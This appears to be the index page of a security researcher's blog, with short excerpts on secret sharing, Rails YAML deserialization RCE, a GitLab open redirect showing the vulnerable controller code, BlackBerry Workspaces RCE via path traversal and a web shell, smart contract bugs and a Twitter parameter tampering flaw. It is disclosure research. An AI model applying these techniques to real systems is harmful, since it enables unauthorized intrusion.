06 Oct 2018

Shamir's Secret Sharing Scheme

Consider a scenario in which you are tasked with managing the security of a bank’s vault. The vault is considered impenetrable without a key, which you are given on your first day on the job. Your goal is to securely manage the key.

Let us suppose that you decide to keep the key on you at all times, granting access to the vault on an as-needed basis. You quickly learn that such a solution doesn’t scale well in practice, as your physical presence is required whenever the vault needs to be opened. What about those vacation days you were promised? Also, perhaps more frighteningly, what if you lost the one and only key?

With your vacation days in mind, you decide to make a copy of the key and entrust it with another employee. However, you realize that this isn’t ideal either. In doubling the number of keys, you have also doubled the number of opportunities for a thief to steal the vault’s key.

Out of desperation, you destroy the duplicate and decide to split the original key in half. Now, you think, two trusted people must be physically present with each key shard to reassemble the key and unlock the vault. This means that a thief would need to steal two key shards to reassemble the original key, which is double the amount of work of stealing one key. However, you soon realize that this scheme isn’t much better than simply having one key, because if either of you were to lose a key half then the full key cannot be recovered anyway.

This problem can be solved with a series of additional keys and locks, but can quickly require a lot of keys and locks when approached this way. You decide that an ideal key management scheme must involve splitting up a key, so that the security of the key isn’t fully entrusted with one person. You also conclude that some threshold of key shards should be required for key reassembly, so that one person losing their key shard (or going on vacation) doesn’t render the entire key unrecoverable.

21 Dec 2017

From YAML Deserialization to RCE in Ruby on Rails Applications

It’s not uncommon for me to find unsafe YAML deserialization while reviewing Ruby on Rails applications. For those who aren’t familiar with the dangers of arbitrary YAML deserialization, the short of it is that deserializing YAML can lead to code execution. This is possible because YAML deserialization allocates a new Ruby object without initializing it, and then calls a callback method named init_with if defined. If an object of a particular class were to be cleverly serialized with a particular set of instance variables then maybe, just maybe, a callback made on deserialization will end up executing dangerous code. This is why it is unsafe to pass user input to YAML.load.

17 Oct 2017

Pervasive Open Redirect in GitLab

While performing a code review of the GitLab open source codebase, I found a pervasive open redirect vulnerability affecting project pages.

The Project Application controller defines a before_action filter named redirect_git_extension. This filter attempts to detect and remove the git extension that may appear in a project request’s URI. In order to do this, it calls the Ruby on Rails redirect_to method with the original request’s params object.

/app/controllers/projects/application_controller.rb:
4
5
skip_before_action :authenticate_user!
before_action :redirect_git_extension

The redirect_to method is defined as follows.

/app/controllers/projects/application_controller.rb:
14
15
16
17
18
19
20
21
  def redirect_git_extension
    # Redirect from
    #   localhost/group/project.git
    # to
    #   localhost/group/project
    #
    redirect_to url_for(params.merge(format: nil)) if params[:format] == 'git'
  end

Due to the requester having control over the params object, the redirect_to method can be called with arbitrary options. For a list of accepted options in the latest version of Ruby on Rails, please see:

http://api.rubyonrails.org/classes/ActionController/Redirecting.html

17 Oct 2017

Remote Code Execution In BlackBerry Workspaces Server

While performing a network penetration test for one of our clients at GDS, I came across a BlackBerry Workspaces (formally WatchDox) Server. These servers can be deployed on customer networks and function as stand-alone appliances. According to BlackBerry’s product webpage:

BlackBerry® Workspaces provides secure file storage, synchronization and sharing for every use case and budget.

Whether you need to enable personal productivity, facilitate team collaboration, or mobilize and transform your entire business, BlackBerry Workspaces is the best choice for secure file collaboration.

I found that by issuing an HTTP request for a file inside of a particular directory, I could get a specific component of the product to return its source code.

By analyzing this source code, I was able to find a directory traversal vulnerability in unauthenticated file upload functionality. Exploiting this, I was able to then upload a web shell into another component’s webroot and obtain remote code execution. Because these kinds of servers house highly sensitive data, I’m sure you can imagine the sort of access this granted me within the client’s organization.

21 Jul 2017

Introducing the Solidity Function Profiler

Static analyzers are good at detecting certain types of security vulnerabilities. However, one place that static analysis often falls short is in the detection of authorization bugs. This is because authorization tends to be a “business logic” problem. How would an analyzer know what functionality should be off-limits to normal users? One can infer based on semantics (looking for words like “admin”), but such clear-cut cases can be rare.

A couple of days ago I wrote about Parity’s multi-sig contract vulnerability. Because there was nothing inherently wrong with the vulnerable functions, aside from the lack the authorization checks, it is unlikely that a static analyzer would have flagged these issues.

If I had to take a guess at the culprit behind this vulnerability getting missed, it would probably be a lack of effective manual code review. Manual code review is a tedious, time-consuming task, but it is often the only way to find certain types of bugs. In this particular case, a human looking at a list of the contract’s functions would have hopefully noticed several suspicious looking public functions.

As far as I know, there are no public tools for Solidity to profile a contract’s functions. That is why today I would like to release a tool called the Solidity Function Profiler.

20 Jul 2017

Parity Multi-Sig Contract Vulnerability

So this just happened. It’s late, but before heading to bed I wanted to quickly write-up a technical analysis of this one because it’s quite short.

25 Jun 2017

Analyzing the ERC20 Short Address Attack

Back in April of 2017, the Golem Project published a blog post about the discovery a security bug affecting some exchanges such as Poloniex. According to the post, when certain exchanges processed transactions of ERC20 tokens, input validation was not being performed on account address length. The result was malformed input data being provided to the contract’s transfer function, and a subsequent underflow condition that manipulated the amount being sent. The impact was that an attacker could potentially rob an exchange account of tokens.

The attack explained by the Golem Project exemplifies a rather unique case in which an exchange acts as both a client and a server. That is, the exchange is a server for users to buy tokens as well as a client to the Ethereum network. This differs from typical contract interaction in which a client uses the Ethereum network directly, and any transaction error would likely be the sole fault of the client and not a third-party. Luckily for the Golem Project, the vulnerability is not known to have ever been exploited. It has since been dubbed the “ERC20 short address attack.”

This got me curious about the feasibility of exploiting this vulnerability today. First and foremost, an attacker would need to manipulate the input data such that A) the provided address resolved to a valid account (ideally one owned by the attacker) and B) the amount specified was less than or equal to that of the exchange’s own supply of ERC20 tokens. How trivial would this be to exploit in the wild today? What can contract developers do to protect themselves?

28 Mar 2017

An Analysis of CVE-2017-5638

I just published some research I did with Gotham Digital Science on the recent Struts vulnerability, CVE-2017-5638. You can find that (rather long) post here, full of in-depth code review and an additional, lesser known attack vector:

An Analysis of CVE-2017-5638

18 Jul 2016

Client-Side Redis Attack Proof of Concept

I’ve developed a somewhat new proof of concept for a client-side attack on Redis. I say somewhat new because the concept of executing Redis commands via JavaScript is nothing new. However, the original lua exploit detailed by benmmurphy has been patched and the question has become “so what’s the threat now?”

Well, I don’t have a lua sandbox escape 0day. And developer machines don’t typically run SSH exposed to the Internet, so dropping keys into a user’s authorized_keys file like antirez explains in his post isn’t all that relevant.

Am I out of luck?

05 May 2016

BSides Pre-Con Capture the Flag

This challenge involved a web application that featured a PHP variable inspector.

The instructions read:

NETTITUDE.COM CTF

Enter some serialised PHP in our form below and we’ll output it on the page.

We have some built in classes too.

Objective: Simply run the “getFlag()” method.

03 Dec 2015

Parameter Tampering Attack on Twitter Web Intents

Twitter’s Web Intents allow visitors of a website to interact with content on Twitter without having to leave the website. This is done by means of a twitter.com popup for desktop users, and native app handlers for iOS and Android users. This is the same platform powering the tweet and follow buttons you may see on webpages across the Internet.

I identified a parameter tampering vulnerability that in total affected all four web intent types. These vulnerabilities allowed an attacker to stage a Web Intent dialog with tampered parameters, which could lead to a visitor following a Twitter user they didn’t intend to follow.

All four intent types were vulnerable: Following a user, liking a tweet, retweeting, and tweeting or replying to a tweet.